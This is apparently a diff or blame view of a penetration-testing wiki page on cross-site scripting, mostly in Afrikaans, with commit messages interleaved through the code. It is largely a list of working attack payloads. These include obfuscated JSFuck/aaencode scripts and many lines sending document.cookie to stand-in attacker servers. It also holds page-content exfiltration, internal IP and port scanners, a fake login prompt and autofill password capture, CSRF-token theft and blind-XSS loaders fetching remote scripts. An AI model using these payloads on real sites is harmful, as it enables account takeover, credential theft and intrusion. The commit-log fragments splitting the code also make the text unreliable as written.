+								<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
 								```
 								```javascript
 								//JSFuck
 								<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
 								```
-												GitBook: [master] 3 pages and 3 assets modified
											
										
										
											2021-05-27 11:24:11 +00:00
+								```javascript
 								//aaencode
 								ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ) +'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) ['c']+((ﾟДﾟ)+'_') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) ['o']+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ];(ﾟДﾟ) ['_'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+'_') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +'_') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +'_') [ﾟΘﾟ]+ (ﾟωﾟﾉ +'_') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]='\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +'_')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]='\"';(ﾟДﾟ) ['_'] ( (ﾟДﾟ) ['_'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');
 								```
-												GITBOOK-3803: No subject

											
										
										
											2023-03-03 16:32:17 +00:00
+								```javascript
 								// It's also possible to execute JS code only with the chars: []`+!${}
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								## XSS algemene lading
-												GITBOOK-3803: No subject

											
										
										
											2023-03-03 16:32:17 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								### Verskeie lading in 1
-												GitBook: [#3055] No subject

											
										
										
											2022-03-14 23:00:10 +00:00
 								{% content-ref url="steal-info-js.md" %}
 								[steal-info-js.md](steal-info-js.md)
 								{% endcontent-ref %}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Haal Koekies op
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
 								<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
 								<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
+								<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
 								<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
 								<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
 								<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
 								<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
 								<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
 								<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
 								<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
 								<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
 								<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
 								<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
 								<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
 								<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
 								<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
-												GitBook: [master] 2 pages modified
											
										
										
											2020-09-22 09:07:48 +00:00
+								<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
+								{% hint style="info" %}
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Jy sal nie in staat wees om die koekies vanaf JavaScript te benader as die HTTPOnly-vlag in die koekie ingestel is nie. Maar hier het jy [sekere maniere om hierdie beskerming te omseil](../hacking-with-cookies/#httponly) as jy gelukkig genoeg is.
-												GitBook: [master] 472 pages modified
											
										
										
											2021-05-27 11:59:23 +00:00
+								{% endhint %}
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Steel Bladsy-inhoud
-												GitBook: [master] one page modified
											
										
										
											2021-09-01 23:18:05 +00:00
+								```javascript
 								var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
 								var attacker = "http://10.10.14.8/exfil";
 								var xhr  = new XMLHttpRequest();
 								xhr.onreadystatechange = function() {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								if (xhr.readyState == XMLHttpRequest.DONE) {
 								fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
 								}
-												GitBook: [master] one page modified
											
										
										
											2021-09-01 23:18:05 +00:00
+								}
 								xhr.open('GET', url, true);
 								xhr.send(null);
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Vind interne IP's
-												GitBook: [#2862] xss find internal ips

											
										
										
											2021-11-26 23:32:24 +00:00
+								```html
 								<script>
 								var q = []
 								var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
 								var wait = 2000
 								var n_threads = 51
 								// Prepare the fetchUrl functions to access all the possible
 								for(i=1;i<=255;i++){
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								q.push(
 								function(url){
 								return function(){
 								fetchUrl(url, wait);
 								}
 								}('http://192.168.0.'+i+':8080'));
-												GitBook: [#2862] xss find internal ips

											
										
										
											2021-11-26 23:32:24 +00:00
+								}
 								// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
 								for(i=1; i<=n_threads; i++){
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								if(q.length) q.shift()();
-												GitBook: [#2862] xss find internal ips

											
										
										
											2021-11-26 23:32:24 +00:00
+								}
 								function fetchUrl(url, wait){
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								console.log(url)
 								var controller = new AbortController(), signal = controller.signal;
 								fetch(url, {signal}).then(r=>r.text().then(text=>
 								{
 								location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
 								}
 								))
 								.catch(e => {
 								if(!String(e).includes("The user aborted a request") && q.length) {
 								q.shift()();
 								}
 								});
-												GitBook: [#2862] xss find internal ips

											
										
										
											2021-11-26 23:32:24 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								setTimeout(x=>{
 								controller.abort();
 								if(q.length) {
 								q.shift()();
 								}
 								}, wait);
-												GitBook: [#2862] xss find internal ips

											
										
										
											2021-11-26 23:32:24 +00:00
+								}
 								</script>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Poortskander (fetch)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
 								```
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								### Poortskander (websockets)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```python
 								var ports = [80, 443, 445, 554, 3306, 3690, 1234];
 								for(var i=0; i<ports.length; i++) {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
 								s.start = performance.now();
 								s.port = ports[i];
 								s.onerror = function() {
 								console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
 								};
 								s.onopen = function() {
 								console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
 								};
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								_Kort tye dui op 'n reagerende poort_ _Langer tye dui op geen reaksie nie._
-												GitBook: [master] 401 pages modified
											
										
										
											2020-11-20 10:55:52 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Gaan die lys van verbode porte in Chrome na [**hier**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc) en in Firefox [**hier**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Boks om vir geloofsbriewe te vra
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Self-vul wagwoorde vasvangst
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								<b>Username:</><br>
 								<input name=username id=username>
 								<b>Password:</><br>
 								<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
 								method:'POST',
 								mode: 'no-cors',
 								body:username.value+':'+this.value
 								});">
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Wanneer enige data in die wagwoordveld ingevoer word, word die gebruikersnaam en wagwoord na die aanvaller se bediener gestuur, selfs as die klient 'n gestoorde wagwoord kies en niks skryf nie, sal die geloofsbriewe uitgelek word.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Sleutelstroker
-												GitBook: [master] 474 pages modified
											
										
										
											2021-05-27 13:02:25 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								Deur net op github te soek, het ek 'n paar verskillende gevind:
-												GitBook: [master] 474 pages modified
											
										
										
											2021-05-27 13:02:25 +00:00
 								* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
 								* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
 								* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Jy kan ook metasploit gebruik `http_javascript_keylogger`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								### Steel CSRF-token
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								<script>
 								var req = new XMLHttpRequest();
 								req.onload = handleResponse;
 								req.open('get','/email',true);
 								req.send();
 								function handleResponse() {
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
 								var changeReq = new XMLHttpRequest();
 								changeReq.open('post', '/email/change-email', true);
 								changeReq.send('csrf='+token+'&email=test@test.com')
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								};
 								</script>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Steel van PostMessage-boodskappe
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<img src="https://attacker.com/?" id=message>
 								<script>
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								window.onmessage = function(e){
 								document.getElementById("message").src += "&"+e.data;
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</script>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Misbruik van Dienswerkers
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3689] No subject

											
										
										
											2022-12-20 11:25:07 +00:00
+								{% content-ref url="abusing-service-workers.md" %}
 								[abusing-service-workers.md](abusing-service-workers.md)
 								{% endcontent-ref %}
-												GitBook: [#2789] gitbook failing again

											
										
										
											2021-10-20 00:45:58 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Toegang tot Skaduwee-DOM
-												GITBOOK-4038: change request with no subject merged in GitBook

											
										
										
											2023-08-16 08:24:17 +00:00
 								{% content-ref url="shadow-dom.md" %}
 								[shadow-dom.md](shadow-dom.md)
 								{% endcontent-ref %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Meertaliges
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Blinde XSS-payloads
-												GitBook: [master] 10 pages and 4 assets modified
											
										
										
											2021-10-08 09:38:39 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Jy kan ook gebruik maak van: [https://xsshunter.com/](https://xsshunter.com)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								"><img src='//domain/xss'>
 								"><script src="//domain/xss.js"></script>
 								><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
-												GitBook: [master] one page modified
											
										
										
											2020-07-30 22:31:02 +00:00
+								<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								<!-- html5sec - Self-executing focus event via autofocus: -->
 								"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
 								<!-- html5sec - JavaScript execution via iframe and onload -->
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
 								"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
 								<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
 								"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
 								<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
 								"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
 								<!-- xsshunter.com - Sites that use JQuery -->
 								<script>$.getScript("//domain")</script>
 								<!-- xsshunter.com - When <script> is filtered -->
 								"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>
 								<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
 								"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>
-												GitBook: [master] one page modified
											
										
										
											2020-07-30 22:31:02 +00:00
+								<!-- noscript trick -->
 								<noscript><p title="</noscript><img src=x onerror=alert(1)>">
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<!-- whitelisted CDNs in CSP -->
 								"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
